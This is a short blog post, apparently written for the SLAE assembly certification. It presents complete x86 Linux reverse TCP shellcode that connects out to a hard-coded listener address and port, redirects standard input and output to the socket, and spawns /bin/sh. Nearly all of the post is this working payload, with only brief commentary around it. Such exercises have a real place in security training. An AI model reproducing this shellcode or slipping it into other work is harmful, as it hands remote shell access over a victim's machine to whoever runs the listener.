Source: SecurityTube
Source: TutorialsPoint
Ok, to implement reverse tcp shell is a bit easy then bind shell, because all what we need is a configure socket and do the connection to our server/listener. In the image above sees TCP Client we only need socket() and connect(), information about details from witch parameters need to be setup, check TutorialPoint manual. I tried to comment all lines in code witch need explication, so code is auto explained, I hope so :D
For compilation please check this script
;coded by SLAE - 513 - Andriy Brukhovetskyy ;syscall numbers can be found here /usr/include/asm/unistd_32.h ;socketcall man - http://www.tutorialspoint.com/unix_sockets/socket_core_functions.htm ;socket families definitions can be locked here: /usr/src//include/linux/socket ;or we can use python socket modude - example socket.AF_INET ;Values needed to configure socket can be found here: ;/usr/include/linux/net.h ;96 bytes lenght global _start section .text _start: ;int socket (int family, int type, int protocol); xor eax, eax mov al, 102 ; socketcall xor ebx, ebx mov bl, 1 ; 1 = SYS_SOCKET socket() xor ecx, ecx push ecx ; putting 0 push BYTE 6 ; IPPROTO_TCP - int protocol push BYTE 1 ; SOCK_STREAM - int type push BYTE 2 ; AF_INET - int domain mov ecx, esp ; ECX - PTR to arguments for socket() int 0x80 mov esi, eax ; save socket fd in ESI for later ;int connect(int sockfd, struct sockaddr *serv_addr, int addrlen); xor eax, eax mov al, 102 ; socketcall xor ebx, ebx mov bl, 3 ; 3 = sys_connect() xor edx, edx push dword 0xfe01a8c0; ip 192.168.1.254 little endiant! push word 0x5c11 ; port 4444 little endiant! dec ebx ; ebx now is 2 push word bx ; 2 - AF_INET inc ebx ; 3 mov ecx, esp ; ptr to struct sockaddr push byte 16 ; socklen_t addrlen push ecx ; struct sockaddr *addr push esi ; int sockfd mov ecx, esp ; ECX = PTR to arguments for connect() int 0x80 ; sockfd will be in EBX mov eax, ebx ; sockfd push BYTE 3 ; count for dup2 pop ecx ; get count ;forwaring STDIN/STDOUT/STDERR dup2_loop: dec ecx mov BYTE al, 63; dup2 syscall number int 0x80 jnz dup2_loop ; jump if not 0 ; spawning as shell xor eax, eax mov al, 11 ; execve syscall xor edx, edx push edx ; '/bin//sh'[::-1] <- reverse mode push 0x68732f2f ; hs// push 0x6e69622f ; nib/ mov ebx, esp push edx push ebx mov ecx, esp ; ESP is now pointing to EDX push edx mov edx, esp int 0x80
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario